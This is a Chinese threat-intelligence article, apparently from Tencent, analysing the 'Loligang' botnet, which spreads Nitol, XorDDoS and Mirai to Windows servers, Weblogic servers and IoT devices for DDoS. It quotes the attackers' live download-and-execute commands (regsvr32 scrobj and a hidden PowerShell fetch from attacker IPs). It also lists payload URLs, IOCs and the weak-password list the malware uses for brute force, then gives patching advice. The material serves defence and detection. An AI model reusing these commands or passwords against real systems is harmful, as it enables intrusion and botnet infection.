freeBuf
主站

分类

云安全 AI安全 开发安全 终端安全 数据安全 Web安全 基础安全 企业安全 关基安全 移动安全 系统安全 其他安全

特色

热点 工具 漏洞 人物志 活动 安全招聘 攻防演练 政策法规

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

    腾讯御见监测到“萝莉帮”跨平台僵尸网络,可发起DDoS攻击
    2019-07-04 09:21:06
    所属地 广东省

    背景

    近期腾讯安全御见威胁情报中心监测到一个名为“萝莉帮(Loligang)”的跨平台僵尸网络,可发起DDoS攻击。组成僵尸网络的电脑包括Windows服务器、Linux服务器以及大量IoT设备,木马类型包括Nitol、XorDDoS和Mirai。

    根据监测数据,受攻击的系统中有较高比例为Weblogic服务器,且攻击时执行的远程脚本中包含VM脚本(web服务端模板velocity环境执行),推测此次攻击中采用了各类Web漏洞利用。 

    Nitol木马入侵Windows系统后会通过IPC$弱口令爆破感染内网中的其他机器,然后连接控制端地址,接受控制指令进行DDoS攻击。感染Linux系统的XorDDoS会在/etc/init.d中创建副本,然后创建一个新的cron.sh脚本并将其添加到定时任务,最终目标为对其他机器发起DDoS攻击。Mirai病毒感染IoT设备,根据不同的CPU架构植入不同的二进制文件,然后对随机生成的IP地址进行探测攻击,接受指令对目标发起DDoS攻击。

    1.png

    “萝莉帮”僵尸网络的组建​ 

    详细分析

    黑客在HFS服务器http[:]/103.30.43.120:99、http[:]/222.186.52.155:21541

    上保存了大量的脚本及木马文件,包括命名后缀为png、vm、sh的脚本,windows平台运行的PE格式文件,Liunx平台运行的ELF格式文件

    2.png

    感染Windows系统

    入侵Windows系统后,首先通过以下命令执行远程代码2.png:

    regsvr32  /u /s /i:http://103.30.43.120:99/2.png scrobj.dll

    3.png


    接着2.png执行Powershell脚本下载Nitol木马ism.exe,保存为json.exe并启动:

    powershell.exe-WindowStyle Hidden $P = nEW-oBJECTsYSTEM.nET.wEBcLIENT;$P.DownloadFile('http[:]//222.186.52.155:21541/sh/ism.exe','C:\\ProgramData\\json.exe');START C:\\ProgramData\\json.exe;STARTC:\\ProgramData\\json.exe 

    ism.exe复制自身到windows目录下,重命名为6位随机名,并将自身安装为服务启动。安装的服务名为: “wdwa”,服务描述为:“Microsoft .NET COM+ Integration with SOAP”

    4.png

    创建新的副本,然后将原木马文件删除

    5.png


    释放加载资源文件

    6.png


    通过IPC$爆破横向传播

    7.png

    爆破使用内置的弱口令密码

    8.png

    完成IPC$共享感染后,病毒程序就会创建线程,连接C2服务器,接受并执行来自于C2服务器的指令。解密C2地址,密文为EhMQHRATHRcQHRIREwkLEwsTQw==,Nitol木马的显著标志为的解密算法:base64+凯撒移位+异或。

    9.png


    解密得到的C2地址为:103.30.43.120:8080

    10.png

    发送上线信息

    11.png

    下载执行程序

    12.png


    更新

    13.png


    使用iexplore.exe打开指定网页

    14.png


    执行DDoS攻击

    15.png

    感染Linux系统

    根据HFS服务器上的文件命名特征”weblogic.sh”,以及被攻击系统中存在大量的Weblogic服务器,推测黑客针对存在Weblogic漏洞的服务器进行批量扫描攻击。

    16.png


    攻击使用的.vm脚本为velocity支持的代码(velocity是基于java的web服务端模板引擎),利用该模板引擎的漏洞进行攻击后,执行远程代码cnm.vm,通过cnm.vm继续下载和执行Linux脚本9527.sh。

    (hxxp:// 222.186.52.155:21541/9527.sh)

    17.png


    Linux脚本9527.sh在感染机器植入ELF木马crosnice

    (hxxp:// 222.186.52.155:21541/crosnice)

    18.png


    crosnice为感染Linux平台的XorDDoS木马, XorDDoS这个名称源于木马在与C&C(命令和控制服务器)的网络通信中大量使用XOR加密。

    创建脚本/etc/cron.hourly/cron.sh,设置定时任务,每3分钟执行一次脚本。

    19.png


    写入脚本代码到/etc/init.d/%s/目录下

    20.png


    对其他机器发起DDoS攻击的代码

    21.png

    感染IoT设备

    该服务器上还发现保存有多个mirai病毒变种,每个变种对应一个特定的平台。Mirai感染受害者设备后,会释放一个shell脚本ssh.sh,shell脚本会下载和执行与当前架构相适应的可执行文件。包括针对以下CPU架构而构建的二进制文件:arm、arm5、arm6、arm7、mips、mpsl、ppc、sh4、spc、xb6、m68k

    22.png


    二进制程序在相应的平台运行后会创建一个随机IP地址列表,并针对具有弱凭据或已知漏洞的设备进行探测攻击,同时连接C2地址,接受指令执行DDoS攻击。

    23.png

    安全建议

    1.定期对服务器进行加固,尽早修复服务器相关组件安全漏洞,部分Weblogic漏洞修复建议如下: 

    CVE-2017-10271修复补丁地址:

    https://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html 

    CVE-2019-2725补丁包下载地址如下:

    https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html?from=timeline 

    2.服务器使用高强度密码,切勿使用弱口令,防止黑客暴力破解,排查IOCs中的弱口令 

    3.针对IoT设备的安全建议:

    1)根据要求和安全策略修改IoT设备的默认隐私和安全设置。

    2)更改设备上的默认凭据。为设备帐户和Wi-Fi网络使用强大且唯一的密码。

    3)在设置Wi-Fi网络访问(WPA)时使用强加密方法。

    4)禁用不需要的功能和服务。

    5)禁用Telnet登录并尽可能使用SSH。 

    4.使用腾讯御点拦截可能的病毒攻击(https://s.tencent.com/product/yd/index.html

    24.png


    5.推荐企业用户部署腾讯御界高级威胁检测系统防御可能的黑客攻击。御界高级威胁检测系统,是基于腾讯安全反病毒实验室的安全能力、依托腾讯在云和端的海量数据,研发出的独特威胁情报和恶意检测模型系统。(https://s.tencent.com/product/gjwxjc/index.html

    25.png

    IOCs

    IP

    122.10.82.239

    139.196.209.127

    103.30.43.120

    222.186.52.155

    122.10.82.239

    Domain

    xiaojiuddos.f3322.net

    6004.f3322.net

    xiao999.f3322.net

    download.nadns.info

    nadns.info

    ip.yototoo.com

    C&C

    139.196.209.127:2017

    103.30.43.120:8080

    103.30.43.120:99

    222.186.52.155:21541

    md5

    ad2fee695125aa611311fe0d940da476

    24abf520f8565b3867fb2c63778d59be

    6595022fb65c6e02c1ebc731ce52b147

    7a158bd42c896807431b798e70f6feb4
    d329eddf620c9f232bad8eb106020712
    975fe4000d8691b00c19fefae2041263
    058281e2cb0add01537fb2a2e70f4ffc
    17d704d023e8001f11b70cc3d1c1800a
    d1d4da603e2be3f131fa1030e9d0038e
    d34903535df5f704ad1fd25bd0d13f1c
    57655082c058a53f9962e81f7c13f9d7
    16e6ec559f3986faa22d89bfaca93a76
    62a6eee507bde271f9ec8115526da15a
    6a3ac93afcc8db933845bcac5f64347a
    29845bf22eb39dda90b8219f495fea14
    98d64c090183b72809d4aef0ed6359fd
    4eb3be468994ad865317fb68cc983dc6
    505e64fb3f1edbabc4374dbfc8f98063
    eecca0eb6255682a520814e991515d83
    f31daa9d4e9f5a24fc4dbe63ea717da6
    d96a091040c54a18cdc1686533338253
    414e0c8015865762933693b6eff5b8fd
    9dec0cdebc8d1e6f8378af24bd66e4f4
    a936182ca83f750e4845c5915800cb6b

    URL

    http[:]/103.30.43.120:99/1.png

    http[:]/103.30.43.120:99/ism.exe

    http[:]/103.30.43.120:99/loligang.arm

    http[:]/103.30.43.120:99/rsrr.vm

    http[:]/103.30.43.120:99/W4.7.exe

    http[:]/103.30.43.120:99/2.png

    http[:]/103.30.43.120:99/down.png

    http[:]/103.30.43.120:99/payload.exe

    http[:]/103.30.43.120:99/pos.vm

    http[:]/103.30.43.120:99/weblogic.sh

    http[:]/222.186.52.155:21541/arxc

    http[:]/222.186.52.155:21541/mixc

    http[:]/222.186.52.155:21541/loligang.arm

    http[:]/222.186.52.155:21541/loligang.arm5

    http[:]/222.186.52.155:21541/loligang.mips

    http[:]/222.186.52.155:21541/sh/1.sh

    http[:]/222.186.52.155:21541/sh/AV.sh

    http[:]/222.186.52.155:21541/sh/dcmini.sh

    http[:]/222.186.52.155:21541/sh/nice.sh

    http[:]/222.186.52.155:21541/sh/R.sh

    IPC$弱口令:

    Woaini
    Baby
    Asdf
    Angel
    Asdfgh
    1314520
    5201314
    Caonima
    88888
    Bbbbbb
    12345678
    Memory
    Abc123
    Qwerty
    123456
    111
    Password
    Enter
    Hack
    Xpuser
    Money
    Yeah
    Time

    参考链接:

    https://www.freebuf.com/column/153847.html

    https://bartblaze.blogspot.com/2015/09/notes-on-linuxxorddos.html

    https://www.symantec.com/blogs/threat-intelligence/mirai-cross-platform-infection


    # 僵尸网络 # ddos攻击 # 腾讯御见威胁情报 # 萝莉帮 # loligang
    本文为 独立观点,未经授权禁止转载。
    如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
    被以下专辑收录,发现更多精彩内容
    + 收入我的专辑
    + 加入我的收藏
    相关推荐
    • 0 文章数
    • 0 关注者
    文章目录